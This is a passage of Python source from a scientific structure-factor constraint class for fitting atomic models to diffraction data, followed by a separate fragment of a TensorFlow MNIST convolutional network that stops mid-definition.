def elementsPairs(self):
""" Elements pairs """
return self.__elementsPairs
@property
def atomsWeight(self):
"""Custom atoms weight"""
return self.__atomsWeight
@property
def weighting(self):
""" Elements weighting definition. """
return self.__weighting
@property
def weightingScheme(self):
""" Elements weighting scheme. """
return self.__weightingScheme
@property
def windowFunction(self):
""" Convolution window function. """
return self.__windowFunction
@property
def Gr2SqMatrix(self):
""" G(r) to S(q) transformation matrix."""
return self.__Gr2SqMatrix
@property
def _experimentalX(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalQValues
@property
def _experimentalY(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalSF
@property
def _modelX(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalQValues
def listen(self, message, argument=None):
"""
Listens to any message sent from the Broadcaster.
:Parameters:
#. message (object): Any python object to send to constraint's
listen method.
#. argument (object): Any type of argument to pass to the
listeners.
"""
if message in ("engine set","update pdb","update molecules indexes","update elements indexes","update names indexes"):
self.__set_weighting_scheme()
# reset histogram
if self.engine is not None:
self.__set_histogram()
self.reset_constraint() # ADDED 2017-JAN-08
elif message in("update boundary conditions",):
self.reset_constraint()
def set_rmin(self, rmin):
"""
Set rmin value.
:parameters:
#. rmin (None, number): The minimum distance value to compute G(r)
histogram. If None is given, rmin is computed as
:math:`2 \\pi / Q_{max}`.
"""
if rmin is None:
minimumDistance = FLOAT_TYPE( 2.*PI/self.__qmax )
else:
assert is_number(rmin), LOGGER.error("rmin must be None or a number")
minimumDistance = FLOAT_TYPE(rmin)
if self.__maximumDistance is not None:
assert minimumDistance<self.__maximumDistance, LOGGER.error("rmin must be smaller than rmax %s"%self.__maximumDistance)
self.__rmin = rmin
self.__minimumDistance = minimumDistance
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__rmin': self.__rmin,
'_StructureFactorConstraint__minimumDistance': self.__minimumDistance})
# reset histogram
self.__set_histogram()
def set_rmax(self, rmax):
"""
Set rmax value.
:Parameters:
#. rmax (None, number): The maximum distance value to compute G(r)
histogram. If None is given, rmax is computed as
:math:`2 \\pi / dQ`.
"""
if rmax is None:
dq = self.__experimentalQValues[1]-self.__experimentalQValues[0]
maximumDistance = FLOAT_TYPE( 2.*PI/dq )
else:
assert is_number(rmax), LOGGER.error("rmax must be None or a number")
maximumDistance = FLOAT_TYPE(rmax)
if self.__minimumDistance is not None:
assert maximumDistance>self.__minimumDistance, LOGGER.error("rmax must be bigger than rmin %s"%self.__minimumDistance)
self.__rmax = rmax
self.__maximumDistance = maximumDistance
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__rmax': self.__rmax,
'_StructureFactorConstraint__maximumDistance': self.__maximumDistance})
# reset histogram
self.__set_histogram()
def set_dr(self, dr):
"""
Set dr value.
:Parameters:
#. dr (None, number): The distance bin value to compute G(r)
histogram. If None is given, bin is computed as
:math:`2 \\pi / (Q_{max}-Q_{min})`.
"""
if dr is None:
bin = 2.*PI/self.__qmax
rbin = round(bin,1)
if rbin>bin:
rbin -= 0.1
bin = FLOAT_TYPE( rbin )
else:
assert is_number(dr), LOGGER.error("dr must be None or a number")
bin = FLOAT_TYPE(dr)
self.__dr = dr
self.__bin = bin
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__dr': self.__dr,
'_StructureFactorConstraint__bin': self.__bin})
# reset histogram
self.__set_histogram()
def set_weighting(self, weighting):
"""
Set elements weighting. It must be a valid entry of pdbparser atom's
database.
:Parameters:
#. weighting (string): The elements weighting scheme. It must be
any atomic attribute (atomicNumber, neutronCohb, neutronIncohb,
neutronCohXs, neutronIncohXs, atomicWeight, covalentRadius)
defined in pdbparser database. In case of xrays or neutrons
experimental weights, one can simply set weighting to 'xrays'
or 'neutrons' and the value will be automatically adjusted to
respectively 'atomicNumber' and 'neutronCohb'. If attribute
values are missing in the pdbparser database, atomic weights
must be given in atomsWeight dictionary argument.
"""
if weighting.lower() in ["xrays","x-rays","xray","x-ray"]:
LOGGER.fixed("'%s' weighting is set to atomicNumber"%weighting)
weighting = "atomicNumber"
elif weighting.lower() in ["neutron","neutrons"]:
LOGGER.fixed("'%s' weighting is set to neutronCohb"%weighting)
weighting = "neutronCohb"
assert is_element_property(weighting),LOGGER.error( "weighting is not a valid pdbparser atoms database entry")
assert weighting != "atomicFormFactor", LOGGER.error("atomicFormFactor weighting is not allowed")
self.__weighting = weighting
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__weighting': self.__weighting})
def set_atoms_weight(self, atomsWeight):
"""
Custom set atoms weight. This is the way to setting a atoms weights
different than the given weighting scheme.
:Parameters:
#. atomsWeight (None, dict): Atoms weight dictionary where keys are
atoms element and values are custom weights. If None is given
or partially given, missing elements weighting will be fully set
given weighting scheme.
"""
if atomsWeight is None:
AW = {}
else:
assert isinstance(atomsWeight, dict),LOGGER.error("atomsWeight must be None or a dictionary")
AW = {}
for k in atomsWeight:
assert isinstance(k, basestring),LOGGER.error("atomsWeight keys must be strings")
try:
val = float(atomsWeight[k])
except:
raise LOGGER.error( "atomsWeight values must be numerical")
AW[k]=val
# set atomsWeight
self.__atomsWeight = AW
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__atomsWeight': self.__atomsWeight})
def set_window_function(self, windowFunction):
"""
Set convolution window function.
:Parameters:
#. windowFunction (None, numpy.ndarray): The window function to
convolute with the computed pair distribution function of the
system prior to comparing it with the experimental data. In
general, the experimental pair distribution function G(r) shows
artificial wrinkles, among others the main reason is because
G(r) is computed by applying a sine Fourier transform to the
experimental structure factor S(q). Therefore window function is
used to best imitate the numerical artefacts in the experimental
data.
"""
if windowFunction is not None:
assert isinstance(windowFunction, np.ndarray), LOGGER.error("windowFunction must be a numpy.ndarray")
assert windowFunction.dtype.type is FLOAT_TYPE, LOGGER.error("windowFunction type must be %s"%FLOAT_TYPE)
assert len(windowFunction.shape) == 1, LOGGER.error("windowFunction must be of dimension 1")
assert len(windowFunction) <= self.experimentalData.shape[0], LOGGER.error("windowFunction length must be smaller than experimental data")
# normalize window function
windowFunction /= np.sum(windowFunction)
# check window size
# set windowFunction
self.__windowFunction = windowFunction
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__windowFunction': self.__windowFunction})
def set_experimental_data(self, experimentalData):
"""
Set constraint's experimental data.
:Parameters:
#. experimentalData (numpy.ndarray, string): The experimental
data as numpy.ndarray or string path to load data using
numpy.loadtxt function.
"""
# get experimental data
super(StructureFactorConstraint, self).set_experimental_data(experimentalData=experimentalData)
# set limits
self.set_limits(self.limits)
def set_limits(self, limits):
"""
Set the reciprocal distance limits (qmin, qmax).
:Parameters:
#. limits (None, tuple, list): Distance limits to bound
experimental data and compute histograms.
If None is given, the limits will be automatically set to
min and max reciprocal distance recorded in experimental data.
If given, a tuple of minimum reciprocal distance (qmin) or None
and maximum reciprocal distance (qmax) or None should be given.
"""
self._ExperimentalConstraint__set_limits(limits)
# set qvalues
self.__experimentalQValues = self.experimentalData[self.limitsIndexStart:self.limitsIndexEnd+1,0].astype(FLOAT_TYPE)
self.__experimentalSF = self.experimentalData[self.limitsIndexStart:self.limitsIndexEnd+1,1].astype(FLOAT_TYPE)
# set qmin and qmax
self.__qmin = self.__experimentalQValues[0]
self.__qmax = self.__experimentalQValues[-1]
assert self.__qmin>0, LOGGER.error("qmin must be bigger than 0. Experimental null q values are ambigous. Try setting limits.")
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__experimentalQValues': self.__experimentalQValues,
'_StructureFactorConstraint__experimentalSF' : self.__experimentalSF,
'_StructureFactorConstraint__qmin' : self.__qmin,
'_StructureFactorConstraint__qmax' : self.__qmax})
# set used dataWeights
self._set_used_data_weights(limitsIndexStart=self.limitsIndexStart, limitsIndexEnd=self.limitsIndexEnd)
# reset constraint
self.reset_constraint()
# reset sq matrix
self.__set_Gr_2_Sq_matrix()
def update_standard_error(self):
""" Compute and set constraint's standardError."""
# set standardError
totalSQ = self.get_constraint_value()["total_no_window"]
self.set_standard_error(self.compute_standard_error(modelData = totalSQ))
def check_experimental_data(self, experimentalData):
"""
Check whether experimental data is correct.
:Parameters:
#. experimentalData (object): The experimental data to check.
:Returns:
#. result (boolean): Whether it is correct or not.
#. message (str): Checking message that explains whats's wrong
with the given data
"""
if not isinstance(experimentalData, np.ndarray):
return False, "experimentalData must be a numpy.ndarray"
if experimentalData.dtype.type is not FLOAT_TYPE:
return False, "experimentalData type must be %s"%FLOAT_TYPE
if len(experimentalData.shape) !=2:
return False, "experimentalData must be of dimension 2"
if experimentalData.shape[1] !=2:
return False, "experimentalData must have only 2 columns"
# check distances order
inOrder = (np.array(sorted(experimentalData[:,0]), dtype=FLOAT_TYPE)-experimentalData[:,0])<=PRECISION
if not np.all(inOrder):
return False, "experimentalData distances are not sorted in order"
if experimentalData[0][0]<0:
return False, "experimentalData distances min value is found negative"
# data format is correct
return True, ""
def compute_standard_error(self, modelData):
"""
Compute the standard error (StdErr) as the squared deviations
between model computed data and the experimental ones.
.. math::
StdErr = \\sum \\limits_{i}^{N} W_{i}(Y(X_{i})-F(X_{i}))^{2}
Where:\n
:math:`N` is the total number of experimental data points. \n
:math:`W_{i}` is the data point weight. It becomes equivalent to 1 when dataWeights is set to None. \n
:math:`Y(X_{i})` is the experimental data point :math:`X_{i}`. \n
:math:`F(X_{i})` is the computed from the model data :math:`X_{i}`. \n
:Parameters:
#. modelData (numpy.ndarray): The data to compare with the
experimental one and compute the squared deviation.
:Returns:
#. standardError (number): The calculated constraint's
standardError.
"""
# compute difference
diff = self.__experimentalSF-modelData
# return standard error
if self._usedDataWeights is None:
return np.add.reduce((diff)**2)
else:
return np.add.reduce(self._usedDataWeights*((diff)**2))
def _get_Sq_from_Gr(self, Gr):
return np.sum(Gr.reshape((-1,1))*self.__Gr2SqMatrix, axis=0)+1
def _apply_scale_factor(self, Sq, scaleFactor):
if scaleFactor != 1:
Sq = scaleFactor*(Sq-1) + 1
return Sq
def __get_total_Sq(self, data, rho0):
"""This method is created just to speed up the computation of
the total Sq upon fitting."""
Gr = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
for pair in self.__elementsPairs:
# get weighting scheme
wij = self.__weightingScheme.get(pair[0]+"-"+pair[1], None)
if wij is None:
wij = self.__weightingScheme[pair[1]+"-"+pair[0]]
# get number of atoms per element
ni = self.engine.numberOfAtomsPerElement[pair[0]]
nj = self.engine.numberOfAtomsPerElement[pair[1]]
# get index of element
idi = self.engine.elements.index(pair[0])
idj = self.engine.elements.index(pair[1])
# get Nij
if idi == idj:
Nij = ni*(ni-1)/2.0
Dij = Nij/self.engine.volume
nij = data["intra"][idi,idj,:]+data["inter"][idi,idj,:]
Gr += wij*nij/Dij
else:
Nij = ni*nj
Dij = Nij/self.engine.volume
nij = data["intra"][idi,idj,:]+data["intra"][idj,idi,:] + data["inter"][idi,idj,:]+data["inter"][idj,idi,:]
Gr += wij*nij/Dij
# Devide by shells volume
Gr /= self.shellVolumes
# compute total G(r)
#rho0 = (self.engine.numberOfAtoms/self.engine.volume).astype(FLOAT_TYPE)
Gr = (FLOAT_TYPE(4.)*PI*self.__shellCenters*rho0)*(Gr-1)
# Compute S(q) from G(r)
Sq = self._get_Sq_from_Gr(Gr)
# Multiply by scale factor
self._fittedScaleFactor = self.get_adjusted_scale_factor(self.__experimentalSF, Sq, self._usedDataWeights)
# apply scale factor
Sq = self._apply_scale_factor(Sq, self._fittedScaleFactor)
# apply multiframe prior and weight
Sq = self._apply_multiframe_prior(Sq)
# convolve total with window function
if self.__windowFunction is not None:
Sq = np.convolve(Sq, self.__windowFunction, 'same')
return Sq
def get_adjusted_scale_factor(self, experimentalData, modelData, dataWeights):
"""Overload to reduce S(q) prior to fitting scale factor.
S(q) -> 1 at high q and this will create a wrong scale factor.
Overloading can be avoided but it's better to for performance reasons
"""
SF = self.scaleFactor
# check to update scaleFactor
if self.adjustScaleFactorFrequency:
if not self.engine.accepted%self.adjustScaleFactorFrequency:
SF = self.fit_scale_factor(experimentalData-1, modelData-1, dataWeights)
return SF
def _get_constraint_value(self, data, applyMultiframePrior=True):
# http://erice2011.docking.org/upload/Other/Billinge_PDF/03-ReadingMaterial/BillingePDF2011.pdf page 6
#import time
#startTime = time.clock()
output = {}
for pair in self.__elementsPairs:
output["sf_intra_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
output["sf_inter_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
output["sf_total_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
gr = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
for pair in self.__elementsPairs:
# get weighting scheme
wij = self.__weightingScheme.get(pair[0]+"-"+pair[1], None)
if wij is None:
wij = self.__weightingScheme[pair[1]+"-"+pair[0]]
# get number of atoms per element
ni = self.engine.numberOfAtomsPerElement[pair[0]]
nj = self.engine.numberOfAtomsPerElement[pair[1]]
# get index of element
idi = self.engine.elements.index(pair[0])
idj = self.engine.elements.index(pair[1])
# get Nij
if idi == idj:
Nij = ni*(ni-1)/2.0
output["sf_intra_%s-%s" % pair] += data["intra"][idi,idj,:]
output["sf_inter_%s-%s" % pair] += data["inter"][idi,idj,:]
else:
Nij = ni*nj
output["sf_intra_%s-%s" % pair] += data["intra"][idi,idj,:] + data["intra"][idj,idi,:]
output["sf_inter_%s-%s" % pair] += data["inter"][idi,idj,:] + data["inter"][idj,idi,:]
# compute g(r)
nij = output["sf_intra_%s-%s" % pair] + output["sf_inter_%s-%s" % pair]
dij = nij/self.__shellVolumes
Dij = Nij/self.engine.volume
gr += wij*dij/Dij
# calculate intensityFactor
intensityFactor = (self.engine.volume*wij)/(Nij*self.__shellVolumes)
# divide by factor
output["sf_intra_%s-%s" % pair] *= intensityFactor
output["sf_inter_%s-%s" % pair] *= intensityFactor
output["sf_total_%s-%s" % pair] = output["sf_intra_%s-%s" % pair] + output["sf_inter_%s-%s" % pair]
# Compute S(q) from G(r)
output["sf_intra_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_intra_%s-%s" % pair])
output["sf_inter_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_inter_%s-%s" % pair])
output["sf_total_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_total_%s-%s" % pair])
# compute total G(r)
rho0 = (self.engine.numberOfAtoms/self.engine.volume).astype(FLOAT_TYPE)
Gr = (FLOAT_TYPE(4.)*PI*self.__shellCenters*rho0) * (gr-1)
# Compute S(q) from G(r)
Sq = self._get_Sq_from_Gr(Gr)
# multiply by scale factor
output["total_no_window"] = self._apply_scale_factor(Sq, self._fittedScaleFactor)
# apply multiframe prior and weight
if applyMultiframePrior:
output["total_no_window"] = self._apply_multiframe_prior(output["total_no_window"])
# convolve total with window function
if self.__windowFunction is not None:
output["total"] = np.convolve(output["total_no_window"], self.__windowFunction, 'same').astype(FLOAT_TYPE)
else:
output["total"] = output["total_no_window"]
return output
def get_constraint_value(self, applyMultiframePrior=True):
"""
Compute all partial Structure Factor (SQs).
:Parameters:
#. applyMultiframePrior (boolean): Whether to apply subframe weight
and prior to the total. This will only have an effect when used
frame is a subframe and in case subframe weight and prior is
defined.
:Returns:
#. SQs (dictionary): The SQs dictionnary, where keys are the
element wise intra and inter molecular SQs and values are
the computed SQs.
"""
if self.data is None:
LOGGER.warn("data must be computed first using 'compute_data' method.")
return {}
return self._get_constraint_value(self.data, applyMultiframePrior=applyMultiframePrior)
def get_constraint_original_value(self):
"""
Compute all partial Pair Distribution Functions (PDFs).
:Returns:
#. PDFs (dictionary): The PDFs dictionnary, where keys are the
element wise intra and inter molecular PDFs and values are the
computed PDFs.
"""
if self.originalData is None:
LOGGER.warn("originalData must be computed first using 'compute_data' method.")
return {}
return self._get_constraint_value(self.originalData)
@reset_if_collected_out_of_date
def compute_data(self, update=True):
""" Compute constraint's data.
:Parameters:
#. update (boolean): whether to update constraint data and
standard error with new computation. If data is computed and
updated by another thread or process while the stochastic
engine is running, this might lead to a state alteration of
the constraint which will lead to a no additional accepted
moves in the run
:Returns:
#. data (dict): constraint data dictionary
#. standardError (float): constraint standard error
"""
intra,inter = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
# create data and compute standard error
data = {"intra":intra, "inter":inter}
totalSQ = self.__get_total_Sq(data, rho0=self.engine.numberDensity)
stdError = self.compute_standard_error(modelData = totalSQ)
# update
if update:
self.set_data(data)
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
self.set_standard_error(stdError)
# set original data
if self.originalData is None:
self._set_original_data(self.data)
# return
return data, stdError
def compute_before_move(self, realIndexes, relativeIndexes):
"""
Compute constraint before move is executed
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Group atoms relative index
the move will be applied to.
"""
intraM,interM = multiple_pairs_histograms_coords( indexes = relativeIndexes,
boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
allAtoms = True,
ncores = self.engine._runtime_ncores )
intraF,interF = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates[relativeIndexes],
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex[relativeIndexes],
elementIndex = self.engine.elementsIndex[relativeIndexes],
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
self.set_active_atoms_data_before_move( {"intra":intraM-intraF, "inter":interM-interF} )
self.set_active_atoms_data_after_move(None)
def compute_after_move(self, realIndexes, relativeIndexes, movedBoxCoordinates):
"""
Compute constraint after move is executed
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Group atoms relative index
the move will be applied to.
#. movedBoxCoordinates (numpy.ndarray): The moved atoms new coordinates.
"""
# change coordinates temporarily
boxData = np.array(self.engine.boxCoordinates[relativeIndexes], dtype=FLOAT_TYPE)
self.engine.boxCoordinates[relativeIndexes] = movedBoxCoordinates
# calculate pair distribution function
intraM,interM = multiple_pairs_histograms_coords( indexes = relativeIndexes,
boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
allAtoms = True,
ncores = self.engine._runtime_ncores )
intraF,interF = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates[relativeIndexes],
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex[relativeIndexes],
elementIndex = self.engine.elementsIndex[relativeIndexes],
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
# set active atoms data
self.set_active_atoms_data_after_move( {"intra":intraM-intraF, "inter":interM-interF} )
# reset coordinates
self.engine.boxCoordinates[relativeIndexes] = boxData
# compute standardError after move
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]+self.activeAtomsDataAfterMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]+self.activeAtomsDataAfterMove["inter"]
totalSQ = self.__get_total_Sq({"intra":dataIntra, "inter":dataInter}, rho0=self.engine.numberDensity)
self.set_after_move_standard_error( self.compute_standard_error(modelData = totalSQ) )
# increment tried
self.increment_tried()
def accept_move(self, realIndexes, relativeIndexes):
"""
Accept move
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Not used here.
"""
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]+self.activeAtomsDataAfterMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]+self.activeAtomsDataAfterMove["inter"]
# change permanently _data
self.set_data( {"intra":dataIntra, "inter":dataInter} )
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
# update standardError
self.set_standard_error( self.afterMoveStandardError )
self.set_after_move_standard_error( None )
# set new scale factor
self._set_fitted_scale_factor_value(self._fittedScaleFactor)
# increment accepted
self.increment_accepted()
def reject_move(self, realIndexes, relativeIndexes):
"""
Reject move
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Not used here.
"""
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
# update standardError
self.set_after_move_standard_error( None )
def compute_as_if_amputated(self, realIndex, relativeIndex):
"""
Compute and return constraint's data and standard error as if
given atom is amputated.
:Parameters:
#. realIndex (numpy.ndarray): Atom's index as a numpy array
of a single element.
#. relativeIndex (numpy.ndarray): Atom's relative index as a
numpy array of a single element.
"""
# compute data
self.compute_before_move(realIndexes=realIndex, relativeIndexes=relativeIndex)
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]
data = {"intra":dataIntra, "inter":dataInter}
# temporarily adjust self.__weightingScheme
weightingScheme = self.__weightingScheme
relativeIndex = relativeIndex[0]
selectedElement = self.engine.allElements[relativeIndex]
self.engine.numberOfAtomsPerElement[selectedElement] -= 1
self.__weightingScheme = get_normalized_weighting(numbers=self.engine.numberOfAtomsPerElement, weights=self._elementsWeight )
for k in self.__weightingScheme:
self.__weightingScheme[k] = FLOAT_TYPE(self.__weightingScheme[k])
## END OF ADDED 08 FEB 2017
# compute standard error
if not self.engine._RT_moveGenerator.allowFittingScaleFactor:
SF = self.adjustScaleFactorFrequency
self._set_adjust_scale_factor_frequency(0)
rho0 = ((self.engine.numberOfAtoms-1)/self.engine.volume).astype(FLOAT_TYPE)
totalSQ = self.__get_total_Sq(data, rho0=rho0)
standardError = self.compute_standard_error(modelData = totalSQ)
if not self.engine._RT_moveGenerator.allowFittingScaleFactor:
self._set_adjust_scale_factor_frequency(SF)
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
# set amputation
self.set_amputation_data( {'data':data, 'weightingScheme':self.__weightingScheme} )
# compute standard error
self.set_amputation_standard_error( standardError )
# reset weightingScheme and number of atoms per element
self.__weightingScheme = weightingScheme
self.engine.numberOfAtomsPerElement[selectedElement] += 1
def accept_amputation(self, realIndex, relativeIndex):
"""
Accept amputated atom and sets constraints data and standard error accordingly.
:Parameters:
#. realIndex (numpy.ndarray): Not used here.
#. relativeIndex (numpy.ndarray): Not used here.
"""
#self.set_data( self.amputationData ) ## COMMENTED 08 FEB 2017
self.set_data( self.amputationData['data'] )
self.__weightingScheme = self.amputationData['weightingScheme']
self.set_standard_error( self.amputationStandardError )
self.set_amputation_data( None )
self.set_amputation_standard_error( None )
# set new scale factor
self._set_fitted_scale_factor_value(self._fittedScaleFactor)
def reject_amputation(self, realIndex, relativeIndex):
"""
Reject amputated atom and set constraint's data and standard
error accordingly.
:Parameters:
#. realIndex (numpy.ndarray): Not used here.
#. relativeIndex (numpy.ndarray): Not used here.
"""
self.set_amputation_data( None )
self.set_amputation_standard_error( None )
def _on_collector_collect_atom(self, realIndex):
pass
def _on_collector_release_atom(self, realIndex):
pass
def _constraint_copy_needs_lut(self):
return {'_StructureFactorConstraint__elementsPairs' :'_StructureFactorConstraint__elementsPairs',
'_StructureFactorConstraint__histogramSize' :'_StructureFactorConstraint__histogramSize',
'_StructureFactorConstraint__weightingScheme' :'_StructureFactorConstraint__weightingScheme',
'_StructureFactorConstraint__shellVolumes' :'_StructureFactorConstraint__shellVolumes',
'_StructureFactorConstraint__shellCenters' :'_StructureFactorConstraint__shellCenters',
'_StructureFactorConstraint__windowFunction' :'_StructureFactorConstraint__windowFunction',
'_StructureFactorConstraint__experimentalQValues' :'_StructureFactorConstraint__experimentalQValues',
'_StructureFactorConstraint__experimentalSF' :'_StructureFactorConstraint__experimentalSF',
'_StructureFactorConstraint__Gr2SqMatrix' :'_StructureFactorConstraint__Gr2SqMatrix',
'_StructureFactorConstraint__minimumDistance' :'_StructureFactorConstraint__minimumDistance',
'_StructureFactorConstraint__maximumDistance' :'_StructureFactorConstraint__maximumDistance',
'_StructureFactorConstraint__bin' :'_StructureFactorConstraint__bin',
'_ExperimentalConstraint__scaleFactor' :'_ExperimentalConstraint__scaleFactor',
'_ExperimentalConstraint__dataWeights' :'_ExperimentalConstraint__dataWeights',
'_ExperimentalConstraint__multiframePrior' :'_ExperimentalConstraint__multiframePrior',
'_ExperimentalConstraint__multiframeWeight' :'_ExperimentalConstraint__multiframeWeight',
'_ExperimentalConstraint__limits' :'_ExperimentalConstraint__limits',
'_ExperimentalConstraint__limitsIndexStart' :'_ExperimentalConstraint__limitsIndexStart',
'_ExperimentalConstraint__limitsIndexEnd' :'_ExperimentalConstraint__limitsIndexEnd',
'_Constraint__used' :'_Constraint__used',
'_Constraint__data' :'_Constraint__data',
'_Constraint__state' :'_Constraint__state',
'_Constraint__standardError' :'_Constraint__standardError',
'_fittedScaleFactor' :'_fittedScaleFactor',
'_usedDataWeights' :'_usedDataWeights',
'_Engine__state' :'_Engine__state',
'_Engine__boxCoordinates' :'_Engine__boxCoordinates',
'_Engine__basisVectors' :'_Engine__basisVectors',
'_Engine__isPBC' :'_Engine__isPBC',
'_Engine__moleculesIndex' :'_Engine__moleculesIndex',
'_Engine__elementsIndex' :'_Engine__elementsIndex',
'_Engine__numberOfAtomsPerElement' :'_Engine__numberOfAtomsPerElement',
'_Engine__elements' :'_Engine__elements',
'_Engine__numberDensity' :'_Engine__numberDensity',
'_Engine__volume' :'_Engine__volume',
'_Engine__realCoordinates' :'_Engine__realCoordinates',
'_atomsCollector' :'_atomsCollector',
('engine','_atomsCollector') :'_atomsCollector',
}
def plot(self, xlabelParams={'xlabel':'$Q(\\AA^{-1})$', 'size':10},
ylabelParams={'ylabel':'$S(Q)$', 'size':10},
**kwargs):
"""
Alias to ExperimentalConstraint.plot with additional parameters
:Additional/Adjusted Parameters:
#. xlabelParams (None, dict): modified matplotlib.axes.Axes.set_xlabel
parameters.
#. ylabelParams (None, dict): modified matplotlib.axes.Axes.set_ylabel
parameters.
"""
return super(StructureFactorConstraint, self).plot(xlabelParams= xlabelParams,
ylabelParams= ylabelParams,
**kwargs)
class ReducedStructureFactorConstraint(StructureFactorConstraint):
"""
The Reduced Structure Factor that we will also note S(Q)
is exactly the same quantity as the Structure Factor but with
the slight difference that it is normalized to 0 rather than 1
and therefore :math:`<S(Q)>=0`.
The computation of S(Q) is done through a Sine inverse Fourier transform
of the computed pair distribution function noted as G(r).
.. math::
S(Q) = \\frac{1}{Q} \\int_{0}^{\\infty} G(r) sin(Qr) dr
The only reason why the Reduced Structure Factor is implemented, is because
many experimental data are treated in this form. And it is just convenient
not to manipulate the experimental data every time.
"""
def _get_Sq_from_Gr(self, Gr):
return np.sum(Gr.reshape((-1,1))*self.Gr2SqMatrix, axis=0)
def _apply_scale_factor(self, Sq, scaleFactor):
if scaleFactor != 1:
Sq = scaleFactor*Sq
return Sq
def get_adjusted_scale_factor(self, experimentalData, modelData, dataWeights):
""" dummy overload that does exactly the same thing
"""
SF = self.scaleFactor
# check to update scaleFactor
if self.adjustScaleFactorFrequency:
if not self.engine.accepted%self.adjustScaleFactorFrequency:
SF = self.fit_scale_factor(experimentalData, modelData, dataWeights)
return SF
def plot(self, xlabelParams={'xlabel':'$Q(\\AA^{-1})$', 'size':10},
ylabelParams={'ylabel':'$S(Q)-1$', 'size':10},
**kwargs):
"""
Alias to ExperimentalConstraint.plot with additional parameters
:Additional/Adjusted Parameters:
#. xlabelParams (None, dict): modified matplotlib.axes.Axes.set_xlabel
parameters.
#. ylabelParams (None, dict): modified matplotlib.axes.Axes.set_ylabel
parameters.
"""
return super(StructureFactorConstraint, self).plot(xlabelParams= xlabelParams,
ylabelParams= ylabelParams,
**kwargs)
|
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('mnist_data',one_hot=True)
batch_size = 100
n_batch = mnist.train.num_examples // batch_size
def weight_variable(shape):
initial = tf.truncated_normal(shape,stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1,shape=shape)
return tf.Variable(initial)
def conv2d(x,W):
return tf.nn.conv2d(x,W,strides=[1,1,1,1],padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')
x = tf.placeholder(tf.float32,[None,784])
y = tf.placeholder(tf.float32,[None,10])
x_image = tf.reshape(x,[-1,28,28,1])
W_conv1 = weight_variable([5,5,1,32])
b_conv1 = bias_variable([32])
h_conv1 = tf.nn.relu(conv2d(x_image,W_conv1) + b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
W_conv2 = weight_variable([5,5,32,64])
b_conv2 = bias_variable([64])
